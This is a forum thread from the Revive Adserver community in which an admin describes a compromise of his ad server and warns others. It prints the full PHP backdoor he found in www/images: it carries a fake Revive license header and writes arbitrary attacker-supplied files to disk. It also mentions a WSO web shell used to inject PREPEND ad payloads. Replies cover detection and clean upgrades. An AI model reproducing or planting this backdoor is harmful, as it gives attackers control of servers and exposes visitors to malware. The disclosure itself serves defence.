Jump to content

Backdoor left by hackers after previous 4.x install has been highjacked...


Recommended Posts

My previous 4.x install got compromised, some of my users were complaining about malware alert and/or unwanted advertising (it was not all the time nor on all platform, making the issue difficult to pinpoint).

I thought cleaning the Revive DB and upgrading my Revive install would be enough to secure my site but sadly no, PREPEND payloads kept being added from time to time despite running the latest version of Revive.

It took some hunting but I eventually discovered the hacker left a tiny PHP file in my Revive www/images directory. As I'm keeping that directory during upgrades, the security hole remained.

The file was simple :

----

<?php

/*
+---------------------------------------------------------------------------+
| Revive Adserver                                                           |
| http://www.revive-adserver.com |
|                                                                           |
| Copyright: See the COPYRIGHT.txt file.                                    |
| License: GPLv2 or later, see the LICENSE.txt file.                        |
+---------------------------------------------------------------------------+
*/

if(isset($_POST['adSelect']) && md5($_POST['adSelect']) == '***MD5HASH***') {

@file_put_contents($_POST['banner_path'], $_POST['banner_contents']);

}

----

This allowed the hacker to load and execute any kind of files/scripts on my server!!!!

Lately he/she was uploading a "1.php" file (containing as I found out a WSO shell) which he/she would connect to, in order to load PREPEND payload to my Revive DB... He would use a different IP to create the 1.php and connect to it (trying to hide its trace). The file would be erased once he/she had done her "job".

The process looks fairly manual.

Of course the hacker may well have left other backdoors outside of my Revive install ? ? ? This makes it impossible to guarantee all issues are resolved after an upgrade (may be a quick check for PREPEND payload and/or PHP files in the www/images directory could offer an alert that something is fishy...).

I would strongly recommend anyone who's had a 4.x install compromised to hunt for such files.

Cheers,

T.

Link to comment
Share on other sites

  • 7 months later...
  • 2 months later...

Any word from Revive on this??? Just ignore it and it the issue will go away, right?

Thank you for sharing this. I was just reading about a widespread exploit against Revive, but can't find anything here from them, only from individual users who've had the issue. It seems like Revive should be publishing methods for finding such exploits, since they left the hole in the software that caused this.

Edited by scott001
Link to comment
Share on other sites

On 2/18/2021 at 7:56 PM, miamiman said:

Thank you Thierry ... I've had a malware issue that is so sporadic it was hard to prove it was in fact revive.

I just checked the www/image folder and sure enough there was the culprit.

Have you found any other malicious files since?

Thanks again!

Glad I could help! I did not find any other file. To spy on my hacker I did replace their file by one of my own that would capture their payload and allow me to understand what they were trying to do... The hacker tried to connect a few more times to my server last July then quitted for a while. He made another attempt last January, I haven't heard back since. 

As I sadly cannot assume there isn't another backdoor left somewhere... ??? I did set a cron job to check on the PREPEND fields every 5 minutes and alert me if something goes wrong (that's probably their favorite ways of delivering payloads to your visitor).

Cheers,

T. 

Link to comment
Share on other sites

On 4/20/2021 at 7:51 PM, scott001 said:

Any word from Revive on this??? Just ignore it and it the issue will go away, right?

Thank you for sharing this. I was just reading about a widespread exploit against Revive, but can't find anything here from them, only from individual users who've had the issue. It seems like Revive should be publishing methods for finding such exploits, since they left the hole in the software that caused this.

Tricky issue!

While during any upgrade they could (should?) check that particular folder for php files (none should be there...) and alert users that the server was compromised. 

The course of action after is beyond their hands depending of what the hackers did. There is also no garantee that they would catch all compromised servers -- the hackers would certainly rush to add more backdoors to the servers they have access to...

Having a false sense of security is worst than knowing you are exposed ? ? ? 

T.

Link to comment
Share on other sites

Or you can just ignore this and nearly every other post in your forum...it seems like nothing ever gets a reply here.

I'm not sure who's running the show, but it seems like most issues posted here go unanswered. Why bother having a forum at all?

Just ignore it, and it will go away, right?

Edited by scott001
Link to comment
Share on other sites

  • 5 weeks later...

I'm late to this party, but typically don't upgrade revive over my current install. I download the latest version to a new directory. There is an article that is similar to my process:

https://www.revive-adserver.com/how-to/update/

It has some steps that I don't use, like making anything world-writeable via chmod 777, but still a good guide to study/adopt. The only two files I copy-over from my previous install is my config and a custom htaccess file that I drop into the admin directory. I don't use a FTP Program, do the majority of the steps at the command line - the rest in a browser. Plugins are updated from the previous install.

When the upgrade is done I delete the previous version that I just upgraded from. The end result is a virtually clean install of the latest version. I re-apply a single line of code back on my actual website and all of the ads are active again.

 

Link to comment
Share on other sites

On 6/5/2021 at 3:34 PM, motowebmaster said:

I'm late to this party, but typically don't upgrade revive over my current install. I download the latest version to a new directory. There is an article that is similar to my process:

https://www.revive-adserver.com/how-to/update/

It has some steps that I don't use, like making anything world-writeable via chmod 777, but still a good guide to study/adopt. The only two files I copy-over from my previous install is my config and a custom htaccess file that I drop into the admin directory. I don't use a FTP Program, do the majority of the steps at the command line - the rest in a browser. Plugins are updated from the previous install.

When the upgrade is done I delete the previous version that I just upgraded from. The end result is a virtually clean install of the latest version. I re-apply a single line of code back on my actual website and all of the ads are active again.

 

The backdoor was placed in the directory containing the ads media that typically gets carried over even after a fresh install... If you don't upload media directly to your server, then your approach is indeed sound. 

T.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...